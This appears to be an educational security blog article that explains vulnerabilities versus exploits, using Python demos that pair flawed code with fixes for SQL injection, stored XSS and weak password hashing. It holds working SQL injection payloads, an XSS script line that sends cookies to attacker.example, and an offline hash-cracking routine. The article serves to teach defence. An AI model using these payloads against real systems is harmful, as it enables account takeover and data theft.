We continuously read about cyber-attacks, hacks and data breaches. The news reports and articles keep referring to terms like vulnerability and exploit. But do you really know the difference?
Unfortunately, even among technically sophisticated people, these two terms are often confused. It is important for IT professionals, let alone cybersecurity professionals, to understand them. Knowing the difference helps them protect their systems against threats and thus keep the business safe.
What Is A Vulnerability?
Vulnerabilities are weaknesses in hardware, software, and even processes, within an environment.
They can provide an attacker with a way to bypass the security controls put into place.
Vulnerabilities may exist anywhere: in hardware devices, firmware, operating systems, modules, drivers, web applications, APIs, and even in your physical security.
Tens of thousands of software bugs are discovered every year, and responsible vendors typically publish patches for the ones that turn out to be security vulnerabilities.
Examples of Security Vulnerabilities
There are a number of security vulnerabilities, but some common ones are:
SQL Injection
SQL injection occurs when an application builds a database query by concatenating untrusted input into the SQL text, so that attacker-supplied input is interpreted as part of the query rather than as data. A successful SQL injection can allow attackers to read or modify sensitive data, bypass authentication, spoof identities and carry out a range of other harmful activities.
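The following is an added example, not code from the original article, that puts the vulnerability and the exploit side by side: a login check that concatenates input into SQL, the same check written with a parameterised query, and the two classic payloads that bypass the first one but not the second. The users table, the passwords and the payload strings are all constructed for the demonstration (passwords are stored in plaintext only to keep the demo minimal; that is itself bad practice).

```python
import sqlite3

# Constructed sample data for the demonstration (not from the original article).
# Plaintext password storage is used only to keep the demo minimal.
USERS = [("alice", "correct horse battery staple"), ("bob", "hunter2")]


def _fresh_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(username: str, password: str) -> bool:
    """The vulnerability: user input is concatenated into the SQL text, so the
    database engine cannot tell attacker-supplied data from query code."""
    conn = _fresh_db()
    query = (
        "SELECT username FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_hardened(username: str, password: str) -> bool:
    """The fix: a parameterised query. The driver passes the SQL text and the
    values separately, so quotes or comment markers in the input are never
    parsed as SQL."""
    conn = _fresh_db()
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# The exploits: payloads that rewrite the meaning of the WHERE clause.
# 1. A tautology in the password field makes the condition always true.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"
# 2. A comment marker in the username field discards the password check:
#    ... WHERE username = 'alice'--' AND password = '...'
COMMENT_PAYLOAD = "alice'--"


if __name__ == "__main__":
    print("legit login, vulnerable code:", login_vulnerable("alice", "correct horse battery staple"))
    print("tautology, vulnerable code  :", login_vulnerable("alice", TAUTOLOGY_PAYLOAD))
    print("comment, vulnerable code    :", login_vulnerable(COMMENT_PAYLOAD, "anything"))
    print("tautology, hardened code    :", login_hardened("alice", TAUTOLOGY_PAYLOAD))
    print("comment, hardened code      :", login_hardened(COMMENT_PAYLOAD, "anything"))
```

The string concatenation in login_vulnerable is the vulnerability; the two payload strings are the exploit. Note that login_hardened is not "immune to SQL injection" in general, it is simply free of this vulnerability: if it later concatenated, say, a sort column name into the query, the same class of exploit would apply again.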
Cross-Site Scripting
A cross-site scripting (XSS) attack also injects malicious code into a website, in this case script that runs in the browser. Unlike SQL injection, however, XSS targets the website's users rather than the site itself, which puts session tokens and other sensitive user data at risk of theft.
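As an added example (not code from the original article), the snippet below renders a list of user comments into HTML twice: once by interpolating the text verbatim, which is the stored-XSS vulnerability, and once after escaping it. The comments, including the script payload and the attacker.example hostname, are constructed for the demonstration.

```python
import html

# Constructed sample comments (not from the original article). The second one
# is the kind of payload an attacker would submit through the comment form.
COMMENTS = [
    "Great article!",
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
]


def render_vulnerable(comment: str) -> str:
    """The vulnerability: user-supplied text is interpolated into the HTML page
    verbatim, so a comment containing markup becomes part of the page and any
    <script> it carries runs in every visitor's browser."""
    return f'<li class="comment">{comment}</li>'


def render_hardened(comment: str) -> str:
    """The fix for this context: escape the HTML-significant characters
    (& < > " ') so the browser displays the payload as text instead of
    parsing it as markup."""
    return f'<li class="comment">{html.escape(comment, quote=True)}</li>'


def render_page(comments, renderer) -> str:
    """Assemble the comment list using the given renderer."""
    return "<ul>\n" + "\n".join(renderer(c) for c in comments) + "\n</ul>"


def contains_script_element(page: str) -> bool:
    """Crude check for the demo: would an HTML parser see a real <script> tag?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print(render_page(COMMENTS, render_vulnerable))
    print()
    print(render_page(COMMENTS, render_hardened))
```

html.escape is the right tool for text placed in an HTML element body or a quoted attribute value. Data placed into a JavaScript string, a URL or a CSS value needs the encoding appropriate to that context; escaping for the wrong context is a common way to "fix" XSS without actually removing it.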
Security Misconfiguration
Any component of a system that attackers can leverage because of a configuration error (default credentials left in place, unnecessary services or debug features enabled, verbose error messages, overly permissive access rules) can be considered a "security misconfiguration."
Unpatched Software
Unpatched software allows attackers to run malicious code by leveraging a known security bug for which a fix exists but has not been applied. The adversary will probe your environment looking for unpatched systems and then attack them directly or indirectly.
Compromised Credentials
An attacker can use compromised credentials to gain unauthorized access to a system in your network. The adversary will try to intercept and extract passwords from unencrypted or incorrectly encrypted communication between your systems, or from insecure handling of passwords by software or users (for example, storing them in plaintext or with a fast, unsalted hash). The adversary may also exploit reuse of passwords across different systems, trying credentials leaked from one service against every other service they can reach.
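The following added example (not code from the original article) shows the "insecure handling by software" side of this: a password store that uses an unsalted SHA-1 hash is cracked with a small dictionary the moment the store leaks, while the same passwords stored with a per-user salt and PBKDF2-HMAC-SHA256 are verifiable by the application but resist the same offline attack. The wordlist and the iteration count are assumptions made for the demo; the count follows current OWASP guidance for PBKDF2-SHA256 and should be tuned to your own hardware.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed stand-in for a leaked-password dictionary.
WORDLIST = ["123456", "password", "hunter2", "letmein", "qwerty"]


def store_weak(password: str) -> str:
    """Weak storage: a fast, unsalted hash. Identical passwords produce identical
    records, and one pass over a wordlist cracks every user in the leaked table."""
    return hashlib.sha1(password.encode()).hexdigest()


def crack_weak(stored: str, wordlist) -> Optional[str]:
    """Offline dictionary attack against an unsalted fast hash. This is what an
    attacker does with a leaked user table; no interaction with the target needed."""
    for guess in wordlist:
        if hashlib.sha1(guess.encode()).hexdigest() == stored:
            return guess
    return None


# Assumed iteration count, in line with current OWASP guidance for PBKDF2-SHA256.
ITERATIONS = 600_000
SALT_LEN = 16


def store_strong(password: str) -> str:
    """Hardened storage: 'salt_hex$digest_hex'. A fresh random salt per user means
    two users with the same password get different records, and precomputed
    tables are useless; the high iteration count makes every guess expensive."""
    salt = os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{salt.hex()}${digest.hex()}"


def verify_strong(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time
    so the comparison does not leak how many bytes matched."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    leaked_weak = store_weak("hunter2")
    print("weak record  :", leaked_weak)
    print("cracked as   :", crack_weak(leaked_weak, WORDLIST))
    strong = store_strong("hunter2")
    print("strong record:", strong)
    print("verify ok    :", verify_strong("hunter2", strong))
    print("verify bad   :", verify_strong("hunter3", strong))
```

Salting and stretching do not make a weak password safe: "hunter2" is still in every wordlist, and an attacker can still run the dictionary against one user's salted record, just at a cost of ITERATIONS hash computations per guess instead of one. What they remove is the ability to crack the whole table in a single pass, which is why password reuse across systems remains the attacker's cheapest route.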
What Is An Exploit?
An exploit is the means by which a vulnerability is leveraged by an attacker to make a system behave in a way its designers did not intend.
For technical exploits it can be a sequence of commands, a crafted input, or a piece of software. A vulnerability with no exploit is a latent weakness; the exploit is what turns it into an actual attack.
Never forget that the human factor can be exploited as well. Social engineering is the exploitation of human psychology to gain access to systems or data.
Perfect Does Not Exist So Prioritize
You will not find a perfect environment, free of vulnerabilities, with no outdated systems, misconfigurations or untrained and negligent employees.
Be realistic about what is vulnerable in your environment versus what is actually exploitable. There is a key difference between the two.
You probably lack the time, resources, budget, even the strategy and the vulnerability management process needed to continuously address every vulnerability on every component of your environment.
Understand which are the most critical areas you should direct your resources to first, by performing regular security risk assessments.
Conclusion
It is important for organizations to be able to answer questions like:
Are our systems vulnerable?
What are the specific vulnerabilities?
What is the value of those systems and the data they hold to the business?
How should we prioritize their protection?
Are there effective security controls in place?
What would the impact on the business be if an attacker successfully exploited one of those vulnerabilities?
Information security maturity does not come overnight.
Dimitris is an Information Technology and Cybersecurity professional with more than 20 years of experience in designing, building and maintaining efficient and secure IT infrastructures.
Among other credentials, he holds the CISSP, CISA, CISM, ITIL, COBIT and PRINCE2 certifications, but his knowledge and technical management capabilities go beyond these certifications. He likes acquiring new skills in penetration testing, cloud technologies, virtualization, network security, IoT and many more.